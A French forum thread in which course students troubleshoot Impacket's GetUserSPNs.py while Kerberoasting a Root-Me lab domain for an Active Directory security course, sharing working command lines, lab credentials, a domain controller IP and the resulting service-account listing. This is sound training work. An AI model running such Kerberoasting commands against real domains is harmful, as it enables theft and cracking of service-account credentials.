Partage
  • Partager sur Facebook
  • Partager sur Twitter

GetUserSPNs.py dans Sécuriser Active Directory

problème d’execution du script

Supernik
  • Windows
    25 janvier 2023 à 22:23:56

    Bonjour,

    je suis le TP de sécurisation d’AD.

    Mais je bloque pour faire fonctionner GetUserSPNs.px

     python3 GetUserSPNs.py -request ctf14.root-me.org/lpoirier:Welcome123 -outputfile hashes.kerberoast

    j’obtiens l’erreur suivante :

    Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[-] Error in searchRequest -> referral: 0000202B: RefErr: DSID-0310084B, data 0, 1 access points
    ref 1: 'ctf14.root-me.org'




    Si vous avez des pistes :)

    • Partager sur Facebook
    • Partager sur Twitter
    Yaskar92
      27 janvier 2023 à 9:34:25

      Salut,

      J'étais pour ma part aussi bloqué mais en cherchant sur internet je suis tombé sur ça et j'ai donc utilisé la commande comme ceci:

      python ./examples/GetUserSPNs.py -dc-ip 212.129.29.187 medic.ex/lpoirier:Welcome123 -outputfile /home/kali/Desktop/hashes.kerberoast

      l'ip étant celle de ctfxx.root-me.org j'ai ainsi obtenu ce résultat:

      Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

ServicePrincipalName  Name     MemberOf  PasswordLastSet             LastLogon  Delegation 
--------------------  -------  --------  --------------------------  ---------  ----------
SQL/SQL01             svc_sql            2022-07-02 14:00:09.199337  <never>               
WWW/INTRANET01        svc                2022-07-02 14:00:09.308719  <never>               



[-] CCache file is not found. Skipping...
[-] Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)


      Je sais que ça ne fait pas fonctionner pour autant la commande mais au moins ça débloque un peu.

      EDIT: Enfaite pour répondre à la question du quizz la sortie est largement suffisante.

      -
      Edité par Yaskar92 27 janvier 2023 à 9:55:54

      • Partager sur Facebook
      • Partager sur Twitter
      Supernik
      • Windows
        28 janvier 2023 à 23:44:25

        Salut!

        Merci beaucoup ca fonctionne effectivement avec ta syntaxe!

        et pour te partager mes découvertes :)

        j’avais aussi le problème de "skew too great" résolu via

        sudo ntpdate cfxx.root-me.org

        (même si effectivement ca ne change rien à la réponse que l’on cherche)

        j’ai trouvé qu’on pouvait lancer GetUsersSPNs sans passer par le chemin et python mais via

        impacket-GetUserSPNs -dc-ip ctf09.root-me.org medic.ex/lpoirier:Welcome123 -outputfile hashes.kerberoast

        et à prioi avec l’url ca fonctionne aussi

        bonne continuation :)


        -
        Edité par Supernik 28 janvier 2023 à 23:45:02

        • Partager sur Facebook
        • Partager sur Twitter

        GetUserSPNs.py dans Sécuriser Active Directory

        × Après avoir cliqué sur "Répondre" vous serez invité à vous connecter pour que votre message soit publié.
        × Attention, ce sujet est très ancien. Le déterrer n'est pas forcément approprié. Nous te conseillons de créer un nouveau sujet pour poser ta question.
        • Editeur
        • Markdown